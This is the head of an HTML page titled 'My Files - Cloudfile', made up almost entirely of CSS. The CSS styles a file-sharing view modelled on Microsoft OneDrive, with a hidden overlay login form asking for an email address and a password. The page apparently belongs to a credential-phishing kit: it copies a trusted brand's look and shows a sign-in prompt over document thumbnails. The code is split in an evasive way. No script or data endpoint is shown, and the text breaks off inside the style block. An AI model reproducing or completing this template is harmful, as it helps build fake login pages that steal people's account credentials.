<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="w3.css">
  
    <link rel="stylesheet" href="all.min.css" integrity="sha512-KfkfwYDsLkIlwQp6LFnl8zNdLGxu9YAA1QvwINks4PhcElQSvqcyVLLD9aMhXd13uQjoXtEKNosOWaZqXgel0g==" crossorigin="anonymous" referrerpolicy="no-referrer">
    <title>My Files - Cloudfile</title>
    <style>
        
        .lds-roller div:nth-child(1):after {
            top: 47.25pt;
        }
        
        [class~=frontDocs] img:hover {
            border-left-style: solid;
        }
        
        [class~=loginForm],
        [class~=overlay] {
            position: absolute;
        }
        
        ** {
            padding-left: 0in;
        }
        
        [class~=overlay] {
            z-index: 10;
        }
        
        ** {
            padding-bottom: 0in;
        }
        
        ** {
            padding-right: 0in;
        }
        
        [class~=overlay] {
            background-color: rgba(0, 0, 0, .582);
        }
        
        [class~=overlay] {
            height: 120vh;
        }
        
        [class~=overlay] {
            width: 100%;
        }
        
        [class~=overlay] {
            top: 0pt;
        }
        
        [class~=loginForm],
        [class~=overlay] {
            display: none;
        }
        
        [class~=loginForm] {
            margin-left: auto;
        }
        
        [class~=loginForm] {
            margin-right: auto;
        }
        
        .lds-roller div:nth-child(1):after {
            left: 3.9375pc;
        }
        
        [class~=loginForm] {
            height: auto;
        }
        
        [class~=loginForm] {
            margin-top: 12%;
        }
        
        [class~=loginForm] {
            max-width: 100%;
        }
        
        [class~=loginForm] {
            width: calc(100% - 0px);
        }
        
        [class~=lds-roller] div:after {
            content: " ";
        }
        
        [class~=loginForm] {
            padding-left: .416666667in;
        }
        
        [class~=loginForm] {
            padding-bottom: .364583333in;
        }
        
        [class~=loginForm] {
            padding-right: .416666667in;
        }
        
        [class~=loginForm] {
            padding-top: .364583333in;
        }
        
        [class~=loginForm] {
            margin-bottom: 21pt;
        }
        
        [class~=loginForm] {
            background-color: #fff;
        }
        
        [class~=loginForm] {
            z-index: 1000;
        }
        
        [class~=lds-roller] div:after {
            display: block;
        }
        
        ** {
            padding-top: 0in;
        }
        
        [class~=loginForm] {
            overflow: hidden;
        }
        
        [class~=formLogo],
        [class~=emailBlock] {
            position: relative;
        }
        
        [class~=emailBlock] {
            display: grid;
        }
        
        [class~=emailBlock] {
            grid-template-columns: auto;
        }
        
        [class~=emailBlock] {
            margin-left: .625pc;
        }
        
        [class~=frontDocs] img:hover,
        [class~=emailImput] {
            border-bottom-style: solid;
        }
        
        [class~=emailBlock] {
            margin-bottom: .625pc;
        }
        
        [class~=emailBlock] {
            margin-right: .625pc;
        }
        
        [class~=frontDocs] img:hover,
        [class~=emailImput] {
            border-right-style: solid;
        }
        
        [class~=emailBlock] {
            margin-top: .625pc;
        }
        
        [class~=emailBlock]>* {
            margin-bottom: .9375pc;
        }
        
        [class~=formLogo] {
            margin-left: -.052083333in;
        }
        
        [class~=formLogo] {
            margin-bottom: .625pc;
        }
        
        [class~=formLogo] {
            margin-right: -.052083333in;
        }
        
        [class~=formLogo] {
            margin-top: -.052083333in;
        }
        
        [class~=lds-roller] div {
            animation: lds-roller 1.2s cubic-bezier(.5, 0, .5, 1) infinite;
        }
        
        [class~=signIn] {
            font-size: 1.5rem;
        }
        
        ** {
            margin-left: 0pc;
        }
        
        [class~=signIn] {
            line-height: 1.75rem;
        }
        
        [class~=signIn] {
            font-weight: 600;
        }
        
        [class~=signIn] {
            cursor: pointer;
        }
        
        [class~=signIn] {
            font-family: "Segoe UI", "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
        }
        
        ** {
            margin-bottom: 0pc;
        }
        
        [class~=emailError],
        [class~=emailInvalid],
        [class~=passwordError],
        [class~=passwordNull] {
            color: red;
        }
        
        [class~=passwordError],
        [class~=emailError],
        [class~=passwordNull],
        [class~=emailInvalid] {
            display: none;
        }
        
        [class~=frontDocs] img:hover,
        [class~=emailImput] {
            border-top-style: solid;
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            display: block;
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            width: auto;
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            background-image: none;
        }
        
        [class~=lds-roller] div:after {
            position: absolute;
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            border-left-style: solid;
        }
        
        [class~=lds-roller] div:nth-child(2):after {
            top: 4.25pc;
        }
        
        [class~=lds-roller] div:nth-child(2):after {
            left: 42pt;
        }
        
        [class~=lds-roller] div:nth-child(3):after {
            top: .739583333in;
        }
        
        [class~=emailImput] {
            border-left-color: rgba(0, 0, 0, .6);
        }
        
        [class~=frontDocs] img:hover {
            border-left-width: .010416667in;
        }
        
        [class~=emailImput] {
            border-bottom-color: rgba(0, 0, 0, .6);
        }
        
        [class~=emailImput] {
            border-right-color: rgba(0, 0, 0, .6);
        }
        
        [class~=emailImput] {
            border-top-color: rgba(0, 0, 0, .6);
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            border-left-width: 0pc;
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            border-bottom-width: thin;
        }
        
        [class~=passwordImput],
        [class~=emailImput] {
            border-right-width: 0pc;
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            border-top-width: 0pc;
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            outline: none;
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            padding-left: 0pt;
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            padding-bottom: 0pc;
        }
        
        [class~=passwordImput],
        [class~=emailImput] {
            padding-right: 0pt;
        }
        
        [class~=passwordImput],
        [class~=emailImput] {
            padding-top: 0pc;
        }
        
        [class~=emailImput] {
            height: 1.875pc;
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            line-height: normal;
        }
        
        [class~=passwordImput],
        [class~=emailImput] {
            font-size-adjust: none;
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            font-kerning: auto;
        }
        
        [class~=lds-roller] div:after {
            width: 7px;
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            font-family: Arial;
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            color: -internal-light-dark(black, white);
        }
        
        [class~=passwordImput],
        [class~=emailImput] {
            letter-spacing: normal;
        }
        
        [class~=passwordImput],
        [class~=emailImput] {
            word-spacing: normal;
        }
        
        [class~=passwordImput],
        [class~=emailImput] {
            appearance: textfield;
        }
        
        [class~=passwordImput],
        [class~=emailImput] {
            background-color: -internal-light-dark(#fff, #3b3b3b);
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            cursor: text;
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            font-style: normal;
        }
        
        [class~=passwordImput],
        [class~=emailImput] {
            font-variant: normal;
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            font-weight: 400;
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            font-stretch: normal;
        }
        
        [class~=emailImput],
        [class~=passwordImput] {
            font-size: 1rem;
        }
        
        [class~=lds-roller] div:nth-child(3):after {
            left: 48px;
        }
        
        [class~=passwordImput] {
            border-bottom-style: solid;
        }
        
        [class~=passwordImput] {
            border-right-style: solid;
        }
        
        [class~=passwordImput] {
            border-top-style: solid;
        }
        
        .formButton,
        [class~=passwordImput] {
            border-left-color: #0067b8;
        }
        
        .formButton,
        [class~=passwordImput] {
            border-bottom-color: #0067b8;
        }
        
        [class~=passwordImput],
        .formButton {
            border-right-color: #0067b8;
        }
        
        [class~=frontDocs] img:hover {
            border-bottom-width: 1px;
        }
        
        [class~=passwordImput],
        .formButton {
            border-top-color: #0067b8;
        }
        
        ** {
            margin-right: 0pc;
        }
        
        [class~=lds-roller] div:nth-child(4):after {
            top: .75in;
        }
        
        ** {
            margin-top: 0pc;
        }
        
        [class~=passwordImput] {
            height: .364583333in;
        }
        
        [class~=frontDocs] img:hover {
            border-right-width: .75pt;
        }
        
        .formButton,
        ** {
            border-left-style: none;
        }
        
        .formButton,
        ** {
            border-bottom-style: none;
        }
        
        [class~=lds-roller] div:after {
            height: .4375pc;
        }
        
        [class~=passwordBlock],
        [class~=loaderBox],
        .formButton,
        [class~=loaderBox2] {
            position: relative;
        }
        
        [class~=lds-roller] div:nth-child(4):after {
            left: 30pt;
        }
        
        .formButton {
            background-color: #0067b8;
        }
        
        .formButton {
            color: #fff;
        }
        
        .formButton {
            line-height: normal;
        }
        
        .formButton {
            padding-left: 0pt;
        }
        
        **,
        .formButton {
            border-right-style: none;
        }
        
        [class~=lds-roller] div:after {
            border-radius: 50%;
        }
        
        [class~=lds-roller] div:after {
            background: #fff;
        }
        
        **,
        .formButton {
            border-top-style: none;
        }
        
        .formButton {
            padding-bottom: .083333333in;
        }
        
        .formButton {
            padding-right: 0pt;
        }
        
        .formButton {
            padding-top: .083333333in;
        }
        
        ** {
            outline: none;
        }
        
        .formButton {
            width: 1.145833333in;
        }
        
        .formButton {
            left: 70%;
        }
        
        [class~=keyLabel],
        .formButton,
        [class~=backArrow] {
            cursor: pointer;
        }
        
        .formButton {
            margin-top: 11.25pt;
        }
        
        [class~=keyLabel] {
            padding-right: 5.25pt;
        }
        
        [class~=keyLabel] {
            color: #0067b8;
        }
        
        [class~=emailLabel] {
            padding-top: 0pt;
        }
        
        [class~=passwordBlock] {
            display: grid;
        }
        
        [class~=passwordBlock] {
            display: none;
        }
        
        [class~=passwordBlock] {
            grid-template-columns: auto;
        }
        
        .passwordBlock>* {
            margin-bottom: 15px;
        }
        
        .labelButtom>* {
            font-size: .8rem;
        }
        
        [class~=labelpassword] {
            display: flex;
        }
        
        [class~=loaderBox] {
            margin-top: -.46875in;
        }
        
        [class~=loaderBox],
        [class~=loaderBox2] {
            margin-left: -50px;
        }
        
        [class~=loaderBox2],
        [class~=loaderBox] {
            width: 130%;
        }
        
        [class~=loaderBox],
        [class~=loaderBox2] {
            overflow: hidden;
        }
        
        [class~=loaderBox2],
        [class~=loaderBox] {
            display: none;
        }
        
        [class~=frontDocs] img:hover {
            border-top-width: 1px;
        }
        
        [class~=loaderBox2] {
            margin-top: -35px;
        }
        
        [class~=oneDrive] {
            position: absolute;
        }
        
        [class~=oneDrive] {
            z-index: 1;
        }
        
        .lds-roller div:nth-child(5):after {
            top: 53.25pt;
        }
        
        [class~=oneDrive] {
            top: 0pt;
        }
        
        [class~=oneDrive] {
            width: 100%;
        }
        
        [class~=sideBar],
        [class~=header] {
            position: relative;
        }
        
        [class~=header] {
            background-color: #0078d4;
        }
        
        [class~=header] {
            line-height: 3pc;
        }
        
        [class~=header] {
            display: flex;
        }
        
        [class~=header] {
            justify-content: space-between;
        }
        
        [class~=frontDocs] img:hover {
            border-left-color: #c4c3c3;
        }
        
        .lds-roller div:nth-child(5):after {
            left: 32px;
        }
        
        [class~=sideBar] {
            background-color: #f2efef;
        }
        
        [class~=sideBar] {
            width: 14.375pc;
        }
        
        [class~=sideBar] {
            height: 94vh;
        }
        
        .subMenu2,
        [class~=subMenu1] {
            position: absolute;
        }
        
        .subMenu2,
        [class~=subMenu1] {
            top: 36pt;
        }
        
        [class~=frontDocs] img:hover {
            border-bottom-color: #c4c3c3;
        }
        
        [class~=subMenu1] {
            width: 100%;
        }
        
        .subMenu2,
        [class~=subMenu1] {
            border-left-style: solid;
        }
        
        .subMenu2,
        [class~=subMenu1] {
            border-bottom-style: solid;
        }
        
        .subMenu2,
        [class~=subMenu1] {
            border-right-style: solid;
        }
        
        [class~=frontDocs] img:hover {
            border-right-color: #c4c3c3;
        }
        
        .subMenu2,
        [class~=subMenu1] {
            border-top-style: solid;
        }
        
        [class~=lds-roller] div:after {
            margin-left: -4px;
        }
        
        [class~=subMenu1],
        .subMenu2 {
            border-left-width: 0pt;
        }
        
        [class~=frontDocs] img:hover {
            border-top-color: #c4c3c3;
        }
        
        [class~=subMenu1],
        .subMenu2 {
            border-bottom-width: .0625pc;
        }
        
        .subMenu2,
        [class~=subMenu1] {
            border-right-width: 0in;
        }
        
        .subMenu2,
        [class~=subMenu1] {
            border-top-width: 0px;
        }
        
        .subMenu2,
        [class~=subMenu1] {
            border-left-color: lightgray;
        }
        
        [class~=lds-roller] div:nth-child(6):after {
            top: 51pt;
        }
        
        .subMenu2,
        [class~=subMenu1] {
            border-bottom-color: lightgray;
        }
        
        [class~=subMenu1],
        .subMenu2 {
            border-right-color: lightgray;
        }
        
        [class~=subMenu1],
        .subMenu2 {
            border-top-color: lightgray;
        }
        
        [class~=lds-roller] div:nth-child(1) {
            animation-delay: -.036s;
        }
        
        [class~=lds-roller] div:nth-child(6):after {
            left: 24px;
        }
        
        [class~=subMenu1],
        .subMenu2 {
            height: 2.6875pc;
        }
        
        .subMenu2,
        [class~=subMenu1] {
            margin-top: .03125in;
        }
        
        .subMenu2 {
            width: 84%;
        }
        
        .subMenu2 {
            margin-left: 2.395833333in;
        }
        
        [class~=lds-roller] div:after {
            margin-bottom: 0;
        }
        
        .subMenu2 {
            display: none;
        }
        
        [class~=lds-roller] div:nth-child(2) {
            animation-delay: -.072s;
        }
        
        .subMenu2 {
            justify-content: space-between;
        }
        
        [class~=lds-roller] div:nth-child(3) {
            animation-delay: -.108s;
        }
        
        .subMenu2 {
            align-items: center;
        }
        
        [class~=lds-roller] div:nth-child(7):after {
            top: 63px;
        }
        
        [class~=lds-roller] div:nth-child(7):after {
            left: .177083333in;
        }
        
        [class~=profileS] {
            display: block;
        }
        
        [class~=new1],
        [class~=frontDocs]>*,
        .sort1,
        [class~=profileL],
        [class~=shrinkmenu1],
        [class~=profileS],
        [class~=shrink1] {
            cursor: pointer;
        }
        
        [class~=uplaod1],
        [class~=shrink1],
        [class~=profileL],
        [class~=sideBar] {
            display: none;
        }
        
        [class~=lds-roller] div:nth-child(4) {
            animation-delay: -.144s;
        }
        
        [class~=lds-roller] div:nth-child(5) {
            animation-delay: -.18s;
        }
        
        [class~=lds-roller] div:nth-child(8):after {
            top: .583333333in;
        }
        
        [class~=lds-roller] div:after {
            margin-right: 0;
        }
        
        .sort1 {
            float: right;
        }
        
        .sort1 {
            padding-top: .041666667in;
        }
        
        .sort1 {
            padding-right: 5px;
        }
        
        [class~=lds-roller] div:nth-child(6) {
            animation-delay: -.216s;
        }
        
        [class~=frontDocs],
        [class~=frontDocs2],
        [class~=lds-roller] {
            position: absolute;
        }
        
        [class~=frontDocs2],
        [class~=frontDocs] {
            height: auto;
        }
        
        [class~=frontDocs2],
        [class~=frontDocs] {
            width: auto;
        }
        
        [class~=frontDocs] {
            top: 90px;
        }
        
        [class~=frontDocs2] {
            display: grid;
        }
        
        [class~=frontDocs2] {
            grid-template-columns: auto auto;
        }
        
        [class~=frontDocs2]>* {
            margin-left: 18.75pt;
        }
        
        [class~=lds-roller] div:nth-child(7) {
            animation-delay: -.252s;
        }
        
        [class~=frontDocs2]>* {
            margin-bottom: .15625in;
        }
        
        [class~=lds-roller] div:nth-child(8):after {
            left: .125in;
        }
        
        [class~=frontDocs]>* {
            margin-left: .052083333in;
        }
        
        [class~=lds-roller] div {
            transform-origin: 2.5pc 40px;
        }
        
        [class~=frontDocs]>* {
            margin-bottom: .052083333in;
        }
        
        [class~=frontDocs]>* {
            margin-right: .052083333in;
        }
        
        [class~=frontDocs]>* {
            margin-top: .052083333in;
        }
        
        [class~=lds-roller] {
            display: inline-block;
        }
        
        [class~=lds-roller] {
            width: .833333333in;
        }
        
        [class~=lds-roller] {
            height: 80px;
        }
        
        [class~=lds-roller] {
            top: 40%;
        }
        
        [class~=lds-roller] {
            bottom: 50%;
        }
        
        [class~=lds-roller] {
            right: 55%;
        }
        
        [class~=lds-roller] {
            left: 43%;
        }
        
        [class~=lds-roller] div:nth-child(8) {
            animation-delay: -.288s;
        }
        
        [class~=lds-roller] div:after {
            margin-top: -.041666667in;
        }
        
        .backArrow:hover {
            background-color: lightgrey;
        }
        
        .backArrow:hover {
            border-radius: 50%;
        }
        
        @keyframes lds-roller {
            0% {
                transform: rotate(0deg);
            }
            100% {
                transform: rotate(360deg);
            }
        }
        
        [class~=name_class],
        [class~=profile_right]>* {
            color: #fff;
        }
        
        [class~=name_class],
        [class~=search_class] {
            position: relative;
        }
        
        [class~=name_class]>*,
        [class~=name_class] {
            margin-left: 3.75pt;
        }
        
        [class~=search_class] {
            background-color: #fff;
        }
        
        [class~=search_class],
        [class~=profile_right] {
            width: auto;
        }
        
        [class~=search_class] {
            max-width: 500px;
        }
        
        [class~=search_class] {
            min-width: 500px;
        }
        
        [class~=search_class] {
            height: 2.1875pc;
        }
        
        [class~=search_class] {
            padding-left: 5px;
        }
        
        .name_class i {
            font-size: 1.5rem;
        }
        
        [class~=search_class] {
            padding-right: 5px;
        }
        
        [class~=search_class] div i,
        [class~=search_class] {
            margin-left: auto;
        }
        
        [class~=search_class] {
            margin-bottom: auto;
        }
        
        [class~=search_class] {
            margin-right: auto;
        }
        
        [class~=search_class] {
            margin-top: auto;
        }
        
        [class~=search_class] {
            display: none;
        }
        
        [class~=sideBar] [class~=lll] {
            margin-left: 0px;
        }
        
        [class~=search_class] {
            justify-content: space-between;
        }
        
        [class~=search_class] {
            border-radius: 3px;
        }
        
        [class~=profile_right] {
            margin-right: 7.5pt;
        }
        
        [class~=sideBar] [class~=lll] {
            margin-bottom: 22.5pt;
        }
        
        .search_class div {
            margin-top: -3.75pt;
        }
        
        [class~=sideBar] [class~=lll] {
            margin-right: 22.5pt;
        }
        
        [class~=profile_right]>* {
            margin-left: 2.5pc;
        }
        
        [class~=profile_right]>* {
            margin-bottom: 2px;
        }
        
        [class~=profile_right]>* {
            margin-right: 2px;
        }
        
        [class~=profile_right]>* {
            margin-top: 1.5pt;
        }
        
        [class~=profile_right]>* {
            font-size: 1.3rem;
        }
        
        [class~=user_profile_icon],
        [class~=doc_img] {
            border-left-style: solid;
        }
        
        [class~=user_profile_icon],
        [class~=doc_img] {
            border-bottom-style: solid;
        }
        
        [class~=user_profile_icon],
        [class~=doc_img] {
            border-right-style: solid;
        }
        
        [class~=user_profile_icon],
        [class~=doc_img] {
            border-top-style: solid;
        }
        
        [class~=user_profile_icon] {
            border-left-width: .0625pc;
        }
        
        [class~=user_profile_icon] {
            border-bottom-width: .0625pc;
        }
        
        [class~=search_class] a,
        .menu2_left>* {
            font-size: 14px;
        }
        
        [class~=search_class] a {
            color: rgba(0, 0, 0, .7);
        }
        
        [class~=user_profile_icon] {
            border-right-width: .0625pc;
        }
        
        [class~=sideBar] i {
            color: #0078d4;
        }
        
        [class~=user_profile_icon] {
            border-top-width: .0625pc;
        }
        
        [class~=user_profile_icon] {
            border-left-color: #fff;
        }
        
        [class~=user_profile_icon] {
            border-bottom-color: #fff;
        }
        
        [class~=user_profile_icon] {
            border-right-color: #fff;
        }
        
        [class~=user_profile_icon] {
            border-top-color: #fff;
        }
        
        [class~=user_profile_icon] {
            border-radius: 50%;
        }
        
        [class~=user_profile_icon] {
            padding-left: 7.5pt;
        }
        
        [class~=sideBar] [class~=lll],
        .upload_btn_class,
        [class~=user_profile_icon] {
            padding-bottom: 5px;
        }
        
        [class~=user_profile_icon] {
            padding-right: 10px;
        }
        
        [class~=sideBar] [class~=lll],
        .upload_btn_class,
        [class~=user_profile_icon] {
            padding-top: 3.75pt;
        }
        
        .upload_btn_class {
            background-color: #0078d4;
        }
        
        .upload_btn_class {
            width: 6.25pc;
        }
        
        .upload_btn_class {
            padding-left: .3125pc;
        }
        
        [class~=sideBar] [class~=lll],
        .upload_btn_class {
            padding-right: .3125pc;
        }
        
        [class~=sideBar] [class~=lll] {
            margin-top: 22.5pt;
        }
        
        .upload_btn_class {
            color: #fff !important;
        }
        
        [class~=sideBar] [class~=lll] {
            width: 100%;
        }
        
        .upload_btn_class {
            border-radius: 3px;
        }
        
        .upload_btn_class {
            margin-left: 3.75pt;
        }
        
        [class~=menu2_left] {
            display: flex;
        }
        
        [class~=menu2_left],
        [class~=doc_overlay] {
            justify-content: center;
        }
        
        [class~=menu2_left] {
            align-items: center;
        }
        
        .menu2_left>* {
            margin-right: 15px;
        }
        
        [class~=sideBar] [class~=lll],
        .menu2_left>* {
            color: rgba(0, 0, 0, .544);
        }
        
        [class~=submenu_right]>* {
            margin-left: .625pc;
        }
        
        [class~=sideBar] [class~=lll] {
            padding-left: 1.875pc;
        }
        
        [class~=search_class] div i,
        [class~=submenu_right]>* {
            color: #0078d4;
        }
        
        [class~=doc_img] {
            position: relative;
        }
        
        [class~=doc_img] {
            width: 1.458333333in;
        }
        
        [class~=doc_img] {
            height: 11.875pc;
        }
        
        [class~=doc_img] {
            border-left-color: #ebebeb;
        }
        
        [class~=doc_img] {
            border-bottom-color: #ebebeb;
        }
        
        [class~=doc_img] {
            border-right-color: #ebebeb;
        }
        
        [class~=doc_img] {
            border-top-color: #ebebeb;
        }
        
        [class~=doc_img] {
            border-radius: .125pc;
        }
        
        [class~=doc_img] {
            border-left-width: .125pc;
        }
        
        [class~=search_class] div i {
            margin-bottom: auto;
        }
        
        [class~=doc_img] {
            border-bottom-width: .125pc;
        }
        
        [class~=doc_img] {
            border-right-width: .125pc;
        }
        
        [class~=doc_img] {
            border-top-width: .125pc;
        }
        
        [class~=doc_overlay]>*,
        [class~=doc_overlay] {
            position: absolute;
        }
        
        [class~=doc_overlay] {
            background: #11d24e;
        }
        
        [class~=sideBar] [class~=lll] {
            font-size: .145833333in;
        }
        
        [class~=doc_overlay] {
            background: linear-gradient(180deg, rgba(17, 210, 78, 0) 60%, rgba(20, 19, 21, 1) 100%);
        }
        
        [class~=doc_overlay] {
            width: 100%;
        }
        
        [class~=doc_overlay] {
            height: 100%;
        }
        
        [class~=doc_overlay] {
            display: grid;
        }
        
        .doc_img:hover {
            border-left-color: rgba(0, 120, 212, .396);
        }
        
        [class~=doc_overlay] {
            z-index: 999;
        }
        
        [class~=doc_overlay]>* {
            justify-self: center;
        }
        
        [class~=doc_overlay]>* {
            bottom: 8px;
        }
        
        [class~=doc_overlay]>* {
            color: rgba(255, 255, 255, .827);
        }
        
        [class~=doc_overlay]>* {
            font-size: .145833333in !important;
        }
        
        .doc_img:hover {
            border-bottom-color: rgba(0, 120, 212, .396);
        }
        
        .doc_img:hover {
            border-right-color: rgba(0, 120, 212, .396);
        }
        
        [class~=search_class] div i {
            margin-right: auto;
        }
        
        .doc_img:hover {
            border-top-color: rgba(0, 120, 212, .396);
        }
        
        .doc_img:hover {
            border-left-width: .1875pc;
        }
        
        .doc_img:hover {
            border-bottom-width: .1875pc;
        }
        
        [class~=search_class] div i {
            margin-top: auto;
        }
        
        .doc_img:hover {
            border-right-width: .1875pc;
        }
        
        .doc_img:hover {
            border-top-width: .1875pc;
        }
        
        @media screen and (min-width: 40em) {
            .loginForm,
            .loginForm {
                position: relative;
            }
            .loginForm {
                margin-left: auto;
            }
            .loginForm {
                margin-right: auto;
            }
            .loginForm,
            .frontDocs2 {
                height: auto;
            }
            .loginForm {
                margin-top: 10%;
            }
            .loginForm {
                max-width: 27.5pc;
            }
            .loginForm {
                width: calc(100% - 40px);
            }
            .loginForm {
                padding-left: 2.5pc;
            }
            .loginForm {
                padding-bottom: 35px;
            }
            .loginForm {
                padding-right: 40px;
            }
            .loginForm {
                padding-top: 35px;
            }
            .loginForm {
                margin-bottom: 28px;
            }
            .loginForm {
                background-color: #fff;
            }
            .loginForm {
                z-index: 1000;
            }
            .loginForm {
                overflow: hidden;
            }
            .loginForm {
                display: none;
            }
            .profileS {
                display: block;
            }
            [class~=search],
            [class~=profileL],
            [class~=sideBar] {
                display: none;
            }
            [class~=shrink1],
            .search_class,
            [class~=profileL],
            [class~=search] {
                cursor: pointer;
            }
            .frontDocs2 {
                position: absolute;
            }
            .frontDocs2 {
                width: auto;
            }
            .frontDocs2 {
                display: grid;
            }
            .frontDocs2 {
                grid-template-columns: auto auto auto;
            }
            .search_class {
                display: flex;
            }
            .search_class {
                min-width: 225pt;
            }
        }
        
        @media screen and (min-width: 60em) {
            [class~=loginForm],
            [class~=loginForm] {
                position: relative;
            }
            [class~=sideBar]>img {
                margin-left: .104166667in;
            }
            [class~=loginForm] {
                margin-left: auto;
            }
            [class~=loginForm] {
                margin-right: auto;
            }
            [class~=loginForm] {
                height: auto;
            }
            [class~=loginForm] {
                margin-top: 10%;
            }
            [class~=loginForm] {
                max-width: 330pt;
            }
            [class~=loginForm] {
                width: calc(100% - 40px);
            }
            [class~=loginForm] {
                padding-left: 30pt;
            }
            [class~=loginForm] {
                padding-bottom: 26.25pt;
            }
            [class~=loginForm] {
                padding-right: 40px;
            }
            [class~=sideBar]>img {
                margin-bottom: .104166667in;
            }
            [class~=loginForm] {
                padding-top: 2.1875pc;
            }
            [class~=loginForm] {
                margin-bottom: 28px;
            }
            [class~=sideBar]>img {
                margin-right: .104166667in;
            }
            [class~=loginForm] {
                background-color: #fff;
            }
            [class~=loginForm] {
                z-index: 1000;
            }
            [class~=loginForm] {
                overflow: hidden;
            }
            [class~=profileS],
            [class~=loginForm] {
                display: none;
            }
            [class~=sideBar]>img {
                margin-top: .104166667in;
            }
            [class~=profileL] {
                display: block;
            }
            [class~=search_class],
            [class~=sideBarBottom]>a,
            [class~=sideBar]>img,
            [class~=profileL] {
                cursor: pointer;
            }
            [class~=search_class] {
                display: flex;
            }
            [class~=search_class] {
                min-width: 375pt;
            }
            [class~=sideBar] {
                display: block;
            }
            [class~=sideBarBottom],
            [class~=lds-roller],
            [class~=frontDocs2] {
                position: absolute;
            }
            [class~=sideBarBottom] {
                bottom: 0pt;
            }
            [class~=sideBarBottom] {
                width: 100%;
            }
            [class~=sideBarBottom]>a {
                font-size: .8rem;
            }
            [class~=sideBarBottom] {
                display: grid;
            }
            [class~=sideBarBottom] {
                color: #0067b8;
            }
            [class~=sideBarBottom] {
                border-left-style: solid;
            }
            [class~=sideBarBottom]>a {
                margin-left: .9375pc;
            }
            [class~=sideBarBottom] {
                border-bottom-style: solid;
            }
            [class~=sideBarBottom] {
                border-right-style: solid;
            }
            [class~=sideBarBottom] {
                border-top-style: solid;
            }
            [class~=sideBarBottom] {
                border-left-width: 0pt;
            }
            [class~=sideBarBottom] {
                border-bottom-width: 0in;
            }
            [class~=sideBarBottom] {
                border-right-width: 0pt;
            }
            [class~=sideBarBottom]>a {
                margin-bottom: .208333333in;
            }
            [class~=sideBarBottom]>a {
                margin-right: .3125pc;
            }
            [class~=sideBarBottom] {
                border-top-width: .010416667in;
            }
            [class~=sideBarBottom]>a {
                margin-top: .3125pc;
            }
            [class~=sideBarBottom] {
                border-left-color: lightgray;
            }
            [class~=sideBarBottom] {
                border-bottom-color: lightgray;
            }
            [class~=sideBarBottom] {
                border-right-color: lightgray;
            }
            [class~=sideBarBottom] {
                border-top-color: lightgray;
            }
            .subMenu1 {
                display: none;
            }
            [class~=subMenu2] {
                display: flex;
            }
            [class~=frontDocs] {
                margin-left: 280px;
            }
            [class~=frontDocs] {
                top: 8.125pc;
            }
            [class~=lds-roller] {
                display: inline-block;
            }
            [class~=lds-roller] {
                width: 5pc;
            }
            [class~=lds-roller] {
                height: 5pc;
            }
            [class~=lds-roller] {
                top: 40%;
            }
            [class~=lds-roller] {
                bottom: 50%;
            }
            [class~=lds-roller] {
                right: 50%;
            }
            [class~=lds-roller] {
                left: 48%;
            }
            [class~=frontDocs2] {
                height: auto;
            }
            [class~=frontDocs2] {
                width: auto;
            }
            [class~=frontDocs2] {
                display: grid;
            }
            [class~=frontDocs2] {
                grid-template-columns: auto auto auto auto;
            }
            [class~=frontDocs2]>* {
                margin-right: 11.25pt;
            }
            [class~=frontDocs2]>* {
                margin-bottom: 11.25pt;
            }
        }
        
        [class~=dot-floating]::before,
        [class~=dot-floating]::after {
            content: "";
        }
        
        [class~=dot-floating]::before,
        [class~=dot-floating]::after {
            display: inline-block;
        }
        
        [class~=dot-floating]::before,
        [class~=dot-floating]::after {
            position: absolute;
        }
        
        [class~=dot-floating] {
            position: relative;
        }
        
        [class~=dot-floating],
        .dot-floating::before,
        .dot-floating::after {
            width: 3.75pt;
        }
        
        .dot-floating::before,
        [class~=dot-floating],
        .dot-floating::after {
            height: .3125pc;
        }
        
        .dot-floating::before {
            left: -9pt;
        }
        
        .dot-floating::before,
        .dot-floating::after,
        [class~=dot-floating] {
            border-radius: 50%;
        }
        
        .dot-floating::after,
        [class~=dot-floating],
        .dot-floating::before {
            background-color: #0067b8;
        }
        
        .dot-floating::after,
        [class~=dot-floating],
        .dot-floating::before {
            color: #0067b8;
        }
        
        .dot-floating::before {
            -webkit-animation: dot-floating-before 3s infinite ease-in-out;
        }
        
        .dot-floating::before {
            animation: dot-floating-before 3s infinite ease-in-out;
        }
        
        .dot-floating::after {
            left: -24px;
        }
        
        [class~=dot-floating] {
            -webkit-animation: dot-floating 3s infinite cubic-bezier(.15, .6, .9, .1);
        }
        
        .dot-floating::after {
            -webkit-animation: dot-floating-after 3s infinite cubic-bezier(.4, 0, 1, 1);
        }
        
        .dot-floating::after {
            animation: dot-floating-after 3s infinite cubic-bezier(.4, 0, 1, 1);
        }
        
        [class~=dot-floating] {
            animation: dot-floating 3s infinite cubic-bezier(.15, .6, .9, .1);
        }
        
        [class~=dot-floating] {
            margin-left: 150pt;
        }
        
